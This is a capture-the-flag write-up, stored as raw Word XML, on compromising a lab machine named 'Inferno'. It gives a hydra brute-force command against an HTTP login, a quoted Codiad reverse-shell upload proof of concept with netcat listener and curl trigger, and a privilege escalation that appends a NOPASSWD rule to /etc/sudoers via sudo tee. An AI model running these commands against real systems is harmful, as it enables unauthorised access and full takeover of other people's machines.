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1AD3" w14:textId="2FB480CC" w:rsidR="007519FF" w:rsidRDefault="006D00D9">
      <w:r>
        <w:t xml:space="preserve">Inferno : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D216E4" w14:textId="37AC5017" w:rsidR="00514EF7" w:rsidRDefault="00514EF7">
      <w:r>
        <w:t>The Open Ports are : HTTP : 80, SSH : 22</w:t>
      </w:r>
      <w:r w:rsidR="002501CE">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002501CE">
        <w:t>somemore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AC67980" w14:textId="77777777" w:rsidR="002501CE" w:rsidRDefault="002501CE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7502459B" w14:textId="6FB5C153" w:rsidR="002501CE" w:rsidRDefault="002501CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E68DB9F" wp14:editId="63CAA200">
            <wp:extent cx="5943394" cy="2302329"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="98338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4039" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId5"/>
                    <a:srcRect t="22466" b="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798DF" w14:textId="77777777" w:rsidR="00514EF7" w:rsidRDefault="00514EF7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23341966" w14:textId="0A8C222C" w:rsidR="006D00D9" w:rsidRDefault="006D00D9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="023EB911" wp14:editId="496A3550">
            <wp:extent cx="5942699" cy="2666547"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="571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352" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect t="9607" b="10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571C7" w14:textId="056C9F57" w:rsidR="006D00D9" w:rsidRDefault="006D00D9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D054EF" w14:textId="29083429" w:rsidR="006D00D9" w:rsidRDefault="006D00D9">
      <w:r>
        <w:t>Found a subdirectory named /inferno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB63229" w14:textId="77777777" w:rsidR="00514EF7" w:rsidRDefault="00514EF7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536485CE" w14:textId="72C0136D" w:rsidR="006D00D9" w:rsidRDefault="006D00D9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FB08488" wp14:editId="318C69B5">
            <wp:extent cx="5943600" cy="2623457"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="8190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6533" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7"/>
                    <a:srcRect t="10256" b="11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0D0C8" w14:textId="189A3232" w:rsidR="006D00D9" w:rsidRDefault="006D00D9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> try to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this http form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653C0393" w14:textId="4CDD1B3B" w:rsidR="006D00D9" w:rsidRDefault="006D00D9">
      <w:r>
        <w:t xml:space="preserve">Hydra : </w:t>
      </w:r>
      <w:r w:rsidRPr="006D00D9">
        <w:t>hydra -l admin -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D00D9">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D00D9">
        <w:t>/share/wordlists/rockyou.txt 10.49.172.96  http-get /inferno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39C080" w14:textId="77777777" w:rsidR="003F7982" w:rsidRDefault="003F7982"/>
    <w:p w14:paraId="6529489D" w14:textId="6ABCFCC7" w:rsidR="003F7982" w:rsidRDefault="003F7982">
      <w:r>
        <w:t>Got the password : dante1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E48DCE" w14:textId="77777777" w:rsidR="006D00D9" w:rsidRDefault="006D00D9"/>
    <w:p w14:paraId="3B927FA1" w14:textId="77777777" w:rsidR="00514EF7" w:rsidRDefault="00514EF7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C258EFE" w14:textId="331EB1A9" w:rsidR="006D00D9" w:rsidRDefault="008A09C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E826187" wp14:editId="6F733E01">
            <wp:extent cx="5942790" cy="2345871"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="2821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6088" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8"/>
                    <a:srcRect t="20220" b="9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3D18A" w14:textId="7807AA6C" w:rsidR="008A09C4" w:rsidRDefault="008A09C4" w:rsidP="008A09C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Found something named “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>codiad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D6EE71" w14:textId="4BE98A92" w:rsidR="008A09C4" w:rsidRDefault="008A09C4" w:rsidP="008A09C4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Codiad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E4B3B" w:rsidRPr="006E4B3B">
        <w:t>Codiad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E4B3B" w:rsidRPr="006E4B3B">
        <w:t xml:space="preserve"> is a web-based IDE framework with a small footprint and minimal requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1806A82A" w14:textId="77777777" w:rsidR="006E4B3B" w:rsidRDefault="006E4B3B" w:rsidP="008A09C4"/>
    <w:p w14:paraId="6543E697" w14:textId="6093D21B" w:rsidR="006E4B3B" w:rsidRDefault="00FA0744" w:rsidP="008A09C4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">So lets found some vuln, or exploit for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>codiad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00354C8F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D661F4" w14:textId="0CC8D3B8" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> found a txt file, showing a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverseshell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can works, when it uploads into a explicit path.</w:t>
      </w:r>
      <w:r w:rsidR="00DF01BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4424A393" w14:textId="1429294D" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t xml:space="preserve">#    Proof of Concept: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CA8A1" w14:textId="09D61406" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t xml:space="preserve">#   1- login on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>codiad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6252A4C6" w14:textId="236481B3" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t xml:space="preserve">#   2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AA32F" w14:textId="61D079D4" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t>#   3-  right click and select upload file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEA7F5B" w14:textId="15DEB700" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t xml:space="preserve">#   4- click on "Drag file or Click Here To Upload" and select your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141335AF" w14:textId="535925F9" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t>after that your file should be in INF directory, right click on your file and select delete,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC091F" w14:textId="1858EED9" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t>and you will see the full path of your file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r>
        <w:t>run it in your terminal with "curl" and boom!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F569D71" w14:textId="77777777" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9"/>
    <w:p w14:paraId="58E2ADD9" w14:textId="77777777" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t>/var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3447B6" w14:textId="77777777" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9"/>
    <w:p w14:paraId="6FAFB77A" w14:textId="77777777" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t xml:space="preserve">1 -  # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lnvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4DE21" w14:textId="431EC386" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="006158B9">
      <w:r>
        <w:t>2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E74E91E" w14:textId="77777777" w:rsidR="006158B9" w:rsidRDefault="006158B9" w:rsidP="008A09C4"/>
    <w:p w14:paraId="4F063180" w14:textId="77777777" w:rsidR="006A592D" w:rsidRDefault="006A592D" w:rsidP="008A09C4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E7754F" w14:textId="41E94FDA" w:rsidR="00354C8F" w:rsidRDefault="006A592D" w:rsidP="008A09C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A945BF" wp14:editId="68A0A192">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>881649</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1524857</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="163080" cy="43200"/>
                <wp:effectExtent l="38100" t="38100" r="46990" b="52070"/>
                <wp:wrapNone/>
                <wp:docPr id="142134964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30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D6D8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8.9pt;margin-top:119.55pt;width:13.85pt;height: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E2D80E" wp14:editId="2E8373C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>883920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1554480</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="329565" cy="186055"/>
                <wp:effectExtent l="38100" t="38100" r="51435" b="42545"/>
                <wp:wrapNone/>
                <wp:docPr id="18239356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956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6BDA" id="Ink 4" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:69.1pt;margin-top:121.9pt;width:26.9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">
                <v:imagedata r:id="rId12" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00354C8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26DC978F" wp14:editId="5E4E87D2">
            <wp:extent cx="5943198" cy="2427514"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="137342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7686" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId13"/>
                    <a:srcRect t="19862" b="7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F8144" w14:textId="21A9FBAC" w:rsidR="00004D5A" w:rsidRDefault="00004D5A" w:rsidP="008A09C4"/>
    <w:p w14:paraId="608A8FAA" w14:textId="72932DDA" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t xml:space="preserve">Copied the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> repo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ADF0B0" w14:textId="77777777" w:rsidR="006A592D" w:rsidRDefault="006A592D" w:rsidP="008A09C4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7124C2A9" w14:textId="3BD6F626" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75284C28" wp14:editId="3C8E581C">
            <wp:extent cx="5942714" cy="2149928"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
            <wp:docPr id="18419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9872" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId14"/>
                    <a:srcRect t="27188" b="8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E4509" w14:textId="77777777" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4"/>
    <w:p w14:paraId="53A822A2" w14:textId="25ABC88F" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t xml:space="preserve">Curls the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to open the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverseshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, which was not a classic shell.. so we cant use so many commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281ED32F" w14:textId="77777777" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4"/>
    <w:p w14:paraId="0F571A12" w14:textId="4F0117A5" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t>Under Downloads directory found a hidden file named “.downloads.dat” there I got the ssh login credentials of “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD46DF" w14:textId="77777777" w:rsidR="006A592D" w:rsidRDefault="006A592D" w:rsidP="008A09C4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604D0A04" w14:textId="08C0A742" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB35935" wp14:editId="31183547">
            <wp:extent cx="5942496" cy="2144485"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
            <wp:docPr id="206423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7104" name="Picture 206423710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2" b="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E47A1" w14:textId="77777777" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4"/>
    <w:p w14:paraId="2D4CDC1B" w14:textId="31DF2C68" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t>Then logins to that machine via ssh : opens the local.txt “first flag” seen in the /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A9CE1" w14:textId="77777777" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4"/>
    <w:p w14:paraId="3E007040" w14:textId="77777777" w:rsidR="00E12945" w:rsidRDefault="00E12945" w:rsidP="008A09C4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B0DBD7" w14:textId="2FD94A34" w:rsidR="00004D5A" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6300CA7C" wp14:editId="111A0FB5">
            <wp:extent cx="5943600" cy="440871"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1958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190" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId16"/>
                    <a:srcRect t="64957" b="2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D84C6" w14:textId="77777777" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4"/>
    <w:p w14:paraId="7613F019" w14:textId="0D91851B" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t>Then tried to get escalate to be a root user, checks the root user permission with “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1640965E" w14:textId="77777777" w:rsidR="00E12945" w:rsidRDefault="00E12945" w:rsidP="008A09C4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3366A0" w14:textId="27918FA6" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E8C58C7" wp14:editId="2AF22C13">
            <wp:extent cx="5939240" cy="478971"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="10986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6533" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId17"/>
                    <a:srcRect t="77819" b="7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56C27" w14:textId="77777777" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4"/>
    <w:p w14:paraId="5C92934E" w14:textId="63B03221" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t xml:space="preserve">Found that tee has the root permission within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ACCDA8" w14:textId="45D056A1" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t>Tee</w:t>
      </w:r>
      <w:r w:rsidRPr="00354C8F">
        <w:t xml:space="preserve"> writes </w:t>
      </w:r>
      <w:r w:rsidRPr="00354C8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stdin</w:t>
      </w:r>
      <w:r w:rsidRPr="00354C8F">
        <w:t xml:space="preserve"> to files </w:t>
      </w:r>
      <w:r w:rsidRPr="00354C8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with the permissions of the executing user</w:t>
      </w:r>
      <w:r w:rsidRPr="00354C8F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354503EB" w14:textId="13AB4A7A" w:rsidR="00E15382" w:rsidRDefault="00E15382" w:rsidP="008A09C4">
      <w:r>
        <w:t xml:space="preserve">Got some clues on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTFobins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A80570" w14:textId="77777777" w:rsidR="00E12945" w:rsidRDefault="00E12945" w:rsidP="008A09C4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7C825D" w14:textId="24A9DDA0" w:rsidR="00E15382" w:rsidRDefault="00E15382" w:rsidP="008A09C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F6C8962" wp14:editId="159C34FF">
            <wp:extent cx="5943198" cy="2411186"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="92565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56137" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId18"/>
                    <a:srcRect t="19862" b="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3524B" w14:textId="77777777" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4"/>
    <w:p w14:paraId="48A818DA" w14:textId="4BBDA620" w:rsidR="00354C8F" w:rsidRDefault="00354C8F" w:rsidP="008A09C4">
      <w:r>
        <w:t xml:space="preserve">So I </w:t>
      </w:r>
      <w:r w:rsidR="00E15382">
        <w:t xml:space="preserve">tries to make changes in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E15382">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E15382">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E15382">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E15382">
        <w:t xml:space="preserve"> : “</w:t>
      </w:r>
      <w:r w:rsidR="00E15382" w:rsidRPr="00E15382">
        <w:t>echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E15382" w:rsidRPr="00E15382">
        <w:t>dante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E15382" w:rsidRPr="00E15382">
        <w:t xml:space="preserve"> ALL=(ALL) NOPASSWD: ALL" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E15382" w:rsidRPr="00E15382">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E15382" w:rsidRPr="00E15382">
        <w:t xml:space="preserve"> tee -a /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E15382" w:rsidRPr="00E15382">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E15382" w:rsidRPr="00E15382">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E15382" w:rsidRPr="00E15382">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E15382">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB74AF" w14:textId="77777777" w:rsidR="00E15382" w:rsidRDefault="00E15382" w:rsidP="008A09C4"/>
    <w:p w14:paraId="25D5AEE3" w14:textId="77777777" w:rsidR="00517581" w:rsidRDefault="00517581" w:rsidP="008A09C4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029F0C78" w14:textId="123C13F1" w:rsidR="00E15382" w:rsidRDefault="00E15382" w:rsidP="008A09C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29DFCBAE" wp14:editId="3731F2CB">
            <wp:extent cx="5939983" cy="631372"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="105352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7151" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId19"/>
                    <a:srcRect t="73260" b="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AF38C" w14:textId="3629BEB6" w:rsidR="00E15382" w:rsidRDefault="00E15382" w:rsidP="008A09C4">
      <w:r>
        <w:t>Then gave the command “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>” to get the root terminal – boom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3969D026" w14:textId="6123FDE8" w:rsidR="00004D5A" w:rsidRDefault="00E15382" w:rsidP="008A09C4">
      <w:r>
        <w:t>Here we can move into the root directory, and got the “proof.txt” flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1392E157" w14:textId="77777777" w:rsidR="00004D5A" w:rsidRDefault="00004D5A" w:rsidP="008A09C4"/>
    <w:sectPr w:rsidR="0000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DB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0CA3F60"/>
    <w:lvl w:ilvl="0" w:tplc="0504C4E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29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D9"/>
    <w:rsid w:val="00004D5A"/>
    <w:rsid w:val="002501CE"/>
    <w:rsid w:val="00354C8F"/>
    <w:rsid w:val="003F7982"/>
    <w:rsid w:val="00514EF7"/>
    <w:rsid w:val="00517581"/>
    <w:rsid w:val="006158B9"/>
    <w:rsid w:val="006A592D"/>
    <w:rsid w:val="006B3365"/>
    <w:rsid w:val="006D00D9"/>
    <w:rsid w:val="006E4B3B"/>
    <w:rsid w:val="007519FF"/>
    <w:rsid w:val="008A09C4"/>
    <w:rsid w:val="00D23B3A"/>
